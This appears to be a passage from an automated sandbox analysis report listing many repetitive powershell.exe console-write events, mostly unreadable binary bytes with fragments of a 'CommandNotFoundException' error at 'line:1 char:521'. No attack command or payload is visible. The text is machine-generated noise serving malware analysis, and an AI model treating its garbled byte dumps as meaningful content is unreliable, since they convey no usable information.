Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.1.............}..v............0...............8.M.....$.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................Hxk....................................}..v.... .......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................Hxk....................................}..v.... .......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................Hxk....................................}..v.... .......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................Hxk....................................}..v.... .......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w................Hxk....................................}..v.... .......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v.... .......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....."......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....#..............................}..v.... $......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....*......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....+..............................}..v.... ,......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....2......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....3..............................}..v.... 4......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....X9......0.......................h.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....:..............................}..v.....:......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....XA......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....B..............................}..v.....B......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n......F......0...............8.M.....4.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....xG..............................}..v.....G......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk....................................}..v....8M......0.......................l.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....M..............................}..v....pN......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ........Ixk......M.............................}..v.....R......0...............8.M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....R..............................}..v....8S......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....`...............................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....`...............................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....H.......0.......................~.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.1.............}..v............0...............8.M.....$.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....H...............................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'................Hxk....H...............................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3................Hxk....H...............................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?................Hxk....H...............................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K................Hxk....H...............................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W................Ixk......M.............................}..v.....&......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W................Hxk....H'..............................}..v.....'......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c................Hxk....H/..............................}..v...../......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o................Ixk......M.............................}..v.....6......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o................Hxk....H7..............................}..v.....7......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{................Ixk......M.............................}..v.....>......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{................Hxk....H?..............................}..v.....?......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....E......0.......................h.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....E..............................}..v....8F......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0................................wI..... .......................}..v.....M...... ...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....M..............................}..v....8N......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....hR......0...............8.M.....4.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.... S..............................}..v.....S......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....X......0.......................l.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....Y..............................}..v.....Z......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ........Ixk......M.............................}..v.....]......0...............8.M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....`^..............................}..v.....^......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....p[......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....(\..............................}..v.....\......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....pc......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....(d..............................}..v.....d......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....j......0.......................~.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....j..............................}..v....Hk......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.1.............}..v....Xo......0...............8.M.....$.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....p..............................}..v.....p......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....Xw......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....x..............................}..v.....x......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....X.......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....X.......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....X.......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+................Ixk......M.............................}..v....X.......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7................Ixk......M.............................}..v....X.......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C................Ixk......M.............................}..v....X.......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O................Ixk......M.............................}..v....X.......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[................Ixk......M.............................}..v............0.......................h.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....0.......0...............8.M.....4.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s................Hxk....................................}..v....h.......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0.......................l.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....`...............................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ........Ixk......M.............................}..v....p.......0...............8.M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....(...............................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....(.......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....(.......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0.......................~.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....H...............................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.1.............}..v............0...............8.M.....$.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../................Ixk......M.............................}..v....H#......0.......................h.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../................Hxk.....$..............................}..v.....$......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;................Ixk......M.............................}..v....H+......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;................Hxk.....,..............................}..v.....,......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n......0......0...............8.M.....4.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................Hxk....h1..............................}..v.....1......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................Ixk......M.............................}..v....(7......0.......................l.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................Hxk.....7..............................}..v....`8......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._....... ........Ixk......M.............................}..v.....;......0...............8.M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................Hxk.....<..............................}..v....(=......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s................Ixk......M.............................}..v.....6......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s................Hxk.....7..............................}..v.....8......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....>......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v.....@......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....pE......0.......................~.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....(F..............................}..v.....F......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.1.............}..v.....J......0...............8.M.....$.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....pK..............................}..v.....K......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....R......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....pS..............................}..v.....S......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....Z......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....p[..............................}..v.....[......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....b......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....pc..............................}..v.....c......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....j......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....pk..............................}..v.....k......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....r......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....ps..............................}..v.....s......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....z......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....p{..............................}..v.....{......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....p...............................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....p...............................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....(.......0.......................h.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....`.......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....(.......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....`.......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.............0...............8.M.....4.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0................................wI..... .......................}..v............ .................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'................Ixk......M.............................}..v............0.......................l.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'................Hxk....................................}..v....@.......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3....... ........Ixk......M.............................}..v............0...............8.M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................Ixk......M.............................}..v....P.......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................Ixk......M.............................}..v....P.......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................Ixk......M.............................}..v............0.......................~.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................Hxk....................................}..v....(.......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.1.............}..v....8.......0...............8.M.....$.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................Hxk....................................}..v....p.......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w................Ixk......M.............................}..v....8.......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w................Hxk....................................}..v....p.......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....8.......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....p.......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....8.......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....p.......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....8.......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....p.......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....8.......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....p.......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....8.......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....p.......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....8.......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....p.......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....8.......0...............................................Jump to behavior
